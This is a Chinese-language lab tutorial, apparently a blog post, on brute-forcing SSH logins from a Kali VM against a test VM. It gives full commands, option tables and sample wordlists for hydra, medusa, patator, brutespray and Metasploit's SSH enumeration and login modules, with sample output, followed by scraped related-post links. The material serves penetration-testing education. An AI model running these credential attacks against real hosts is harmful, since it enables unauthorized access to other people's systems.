1.实验环境

准备一台装有kali的虚拟机和一台ssh端口开放的虚拟机
这里面的暴力破解全是使用的kali里面自带的软件破解的。

kali             192.168.13.145       #装有kali的虚拟机
localhost       192.168.13.128       #被破解的虚拟机
首先我们去192.168.13.128 上面创建用户并设置密码以供测试
[root@localhost ~]# useradd yjssjm
[root@localhost ~]# passwd yjssjm
更改用户 yjssjm 的密码 。
新的 密码:
无效的密码: 密码少于 8 个字符
重新输入新的 密码:
passwd:所有的身份验证令牌已经成功更新。
用户名 yjssjm  密码123

2. hydra [海德拉]

hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被
破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。

指定单个用户和密码

root@kali:~# hydra -l root -p 1 192.168.13.128 ssh
-l (小写l)          指定用户
-p(小写p)           指定密码


用户列表破解
指定单个的用户和密码一个一个去试的话比较麻烦,我们何以创建一些写有用户名和密码的文件从而来指定文件。

root@kali:~# vim userlist.txt
root
yjssjm
admin
test
root@kali:~# vim passwdlist.txt
1
12
123
1234
yjssjm
root@kali:~# hydra -L userlist.txt -P passwdlist.txt -t 20 192.168.13.128 ssh
-L(大写L) 指定用户列表
-P(大写P) 指定密码列表
-t 指定线程数
root@kali:~# vim hostlist.txt    #创建主机列表
192.168.13.128
root@kali:~# hydra -L userlist.txt -P passwdlist.txt -M hostlist.txt ssh -o ssh-hydra.ok
-M 指定主机列表

3.Medusa [美杜莎]

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行
强力测试。Medusa 和 hydra 一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra
要好很多,但其支持模块要比 hydra 少一些。

语法参数

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h  [TEXT] 目标主机名称或者IP地址
-H  [FILE] 包含目标主机名称或者IP地址文件
-u      [TEXT] 测试的用户名 -U [FILE] 包含测试的用户名文件
-p      [TEXT] 测试的密码
-P  [FILE] 包含测试的密码文件
-C  [FILE] 组合条目文件
-O  [FILE] 日志信息文件
-e  [n/s/ns] n代表空密码,s代表为密码与用户名相同
-M  [TEXT] 模块执行名称
-m  [TEXT] 传递参数到模块
-d  显示所有的模块名称
-n  [NUM] 使用非默认Tcp端口
-s  启用SSL
-r      [NUM] 重试间隔时间,默认为3秒
-t      [NUM] 设定线程数量
-T  同时测试的主机总数
-L  并行化,每个用户使用一个线程
-f      在任何主机上找到第一个账号/密码后,停止破解
-F  在任何主机上找到第一个有效的用户名/密码后停止审计
-q  显示模块的使用信息
-v  [NUM] 详细级别(0-6)
-w  [NUM] 错误调试级别(0-10)
-V  显示版本
-Z  [TEXT] 继续扫描上一次

常用的参数

root@kali:~# medusa -M ssh -h 192.168.13.128 -u root -P passwdlist.txt
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passwdlist.txt

root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passwdlist.txt -F   #成功就停止
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passwdlist.txt -O ssh.log   #日志

4.patator

Patator,强大的命令行暴力破解器
1.可用模块

2.用法

3.示例

root@kali:~# patator ssh_login host=192.168.13.128 user=root password=FILE0 0=passwdlist.txt
root@kali:~# patator ssh_login host=192.168.13.128 user=root password=FILE0 0=passwdlist.txt -x ignore:mesg='Authentication failed.'    #忽略失败的信息
这里面FILE是必须写的,但是后面的阿拉伯数字是任意的,但是要对应。如:
password=FILE2 2=passwdlist.txt      相当于password=passwdlist.txt 的意思
root@kali:~# patator ssh_login host=192.168.13.128 user=FILE1 1=userlist.txt password=FILE0 0=passwdlist.txt -x ignore:mesg='Authentication failed.'

5.BrutesPray

BruteSpray 是一款基于nmap扫描输出的gnmap/XML文件.自动调用Medusa对服务进行爆破(Medusa美杜莎 是一款端口 爆破工具,速度比Hydra九头蛇快)。

因为不是kali自带的,所以我们需要安装。安装时间很长----
root@kali:~# apt-get update
root@kali:~# apt-get install brutespray

重要参数

-f FILE, --file FILE 参数后跟一个文件名, 解析nmap输出的GNMAP或者XML文件
-o OUTPUT, --output OUTPUT 包含成功尝试的目录
-s SERVICE, --service SERVICE 参数后跟一个服务名, 指定要攻击的服务
-t THREADS, --threads THREADS 参数后跟一数值,指定medusa线程数
-T HOSTS, --hosts HOSTS 参数后跟一数值,指定同时测试的主机数
-U USERLIST, --userlist USERLIST 参数后跟用户字典文件
-P PASSLIST, --passlist PASSLIST 参数后跟密码字典文件
-u USERNAME, --username USERNAME 参数后跟用户名,指定一个用户名进行爆破
-p PASSWORD, --password PASSWORD 参数后跟密码,指定一个密码进行爆破
-c, --continuous 成功之后继续爆破
-i, --interactive 交互模式

6.MSF

Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试, Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语 言,汇编程序和Python编写的可选组件。

root@kali:~# msfconsole   #启动msf
msf > search ssh       #调用ssh模块
#上面两步可能需要几分钟等待,不要着急1.SSH用户枚举
msf > use auxiliary/scanner/ssh/ssh_enumusers     #ssh枚举的指令
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.13.128    #指定主机
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/userlist.txt   #指定用户列表文件
msf auxiliary(scanner/ssh/ssh_enumusers) > run  #自动执行
[*] 192.168.13.128:22 - SSH - Checking for false positives
[*] 192.168.13.128:22 - SSH - Starting scan
[+] 192.168.13.128:22 - SSH - User 'root' found
[+] 192.168.13.128:22 - SSH - User 'yjssjm' found
[-] 192.168.13.128:22 - SSH - User 'admin' not found
[-] 192.168.13.128:22 - SSH - User 'test' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed2. SSH版本探测
msf auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.13.128
msf auxiliary(scanner/ssh/ssh_version) > run[+] 192.168.13.128:22     - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed3 SSH 暴力破解
msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.13.128
msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/userlist.txt
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passwdlist.txt
msf auxiliary(scanner/ssh/ssh_login) > run

SSH密码暴力破解及防御实战----攻相关推荐

  1. SSH密码暴力破解及防御实战

    前言:本文对目前流行的 SSH 密码暴力破解工具进行实战研究.分析和总结,对渗透攻击测试和安全防御具有一定的参考价值. 首先介绍几款常用的ssh暴力破解工具: 1. hydra [海德拉] 指定用户破 ...

  2. kali-linux教程 ssh密码暴力破解和防御实战

    1 hydra[海德拉] Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具. 指 ...

  3. Linux SSH密码暴力破解技术及攻防实战

    对于Linux操作系统来说,一般通过VNC.Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group ...

  4. 密码暴力破解漏洞(kali crunch)

    目录 1.密码安全 2.漏洞利用 3.不安全的密码 4.密码猜解思路 5. 字典wordlist 5.1 kali字典 5.2 github字典 6.专用字典 6.1 指定格式字典 6.2 社工字典 ...

  5. 开源服务专题之------ssh防止暴力破解及fail2ban的使用方法

    15年出现的JAVA反序列化漏洞,另一个是redis配置不当导致机器入侵.只要redis是用root启动的并且未授权的话,就可以通过set方式直接写入一个authorized_keys到系统的/roo ...

  6. web后台登录口令暴力破解及防御

    在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等.前台用户可以自由注册,而后台是网站管理或者维护人员设定 ...

  7. Linux主机密码暴力破解

    一.目的   针对Linux主机SSH协议暴力破解过程以及漏洞原理和修复方式详细介绍. 二.漏洞介绍 2.1 漏洞原因   由于主机用户没有设置密码或者设置了linux弱密码,且未对主机设置严格的基线 ...

  8. linux密码暴力破解之SHA-512破解

    linux密码暴力破解 由于MD5加密已经发展了很多年,现在市面上已经积累了大量的MD5数据,这样,MD5的安全性也就受到了威胁,所以,从centos6.x版本开始,系统密码开始采用SHA-512加密 ...

  9. 你的Root账号安全吗?-看我用phpmyadmin密码暴力破解工具攻破你的系统

    你的Root账号安全吗?-看我用phpmyadmin密码暴力破解工具攻破你的系统 simeon phpmyadmin密码暴力破解是指通过指定账号和密码对mysql数据库进行登录尝试,如果字典中的密码跟 ...

最新文章

  1. RBAC基于角色的用户权限管理
  2. 了不起的开发者 丨 有奖征文活动来啦!
  3. Label Studio 入门
  4. 15分钟从零开始搭建支持10w+用户的生产环境(一)
  5. tcp分包传图片 如何还原_技术控丨超详细解析TCP重传机制
  6. 应用程序框架实战十八:DDD分层架构之聚合
  7. [转载] python机器学习库sklearn——参数优化(网格搜索GridSearchCV、随机搜索RandomizedSearchCV、hyperopt)
  8. 如何用计算机计算胸围,胸围尺码换算(罩杯自动计算器)
  9. 《21天学通Java(第6版)》—— 2.7 总结
  10. could not resolve property: qid of: org.lxh.myzngt.vo.Answer [SELECT COUNT(q.qid) FROM org.lxh.myzn
  11. 不要低估实现难度,聊聊当下热议的“元宇宙”是什么?
  12. 矩阵分解(三)——满秩分解
  13. ps制作html网页的跳转,PS图片转页面CSS+HTML的步骤
  14. fmod文档解析音频_将音频插入Word 2007文档
  15. 横向和纵向的数据库分表
  16. Python爬虫之实现百度翻译
  17. 服务器操作系统linux,关于服务器的操作系统
  18. c语言计算器开题报告,基于单片机的简易电子计算器设计开题报告.doc
  19. 【Linux】Linux的共享内存
  20. scratch接红包游戏 电子学会图形化编程scratch等级考试三级真题和答案解析2021-9

热门文章

  1. 常见蛋白质种类_关于健身常用的4种蛋白粉
  2. 【图片】机器学习--名画风格 neural-style
  3. 进入公司暂时没事做怎么办
  4. W3C 代码标准规范
  5. QQ小程序如何点击按钮跳转到加群界面
  6. 文件上传工具--dropzone.js
  7. 化妆definer是什么意思_有谁知道化妆品上的圈R是代表什么意思?
  8. matlab 生物信息学工具箱,Matlab生物信息学工具箱新增功能
  9. linux查看进程的内存使用情况,[转]linux下查看进程内存使用情况
  10. 【C++知识点】STL 容器总结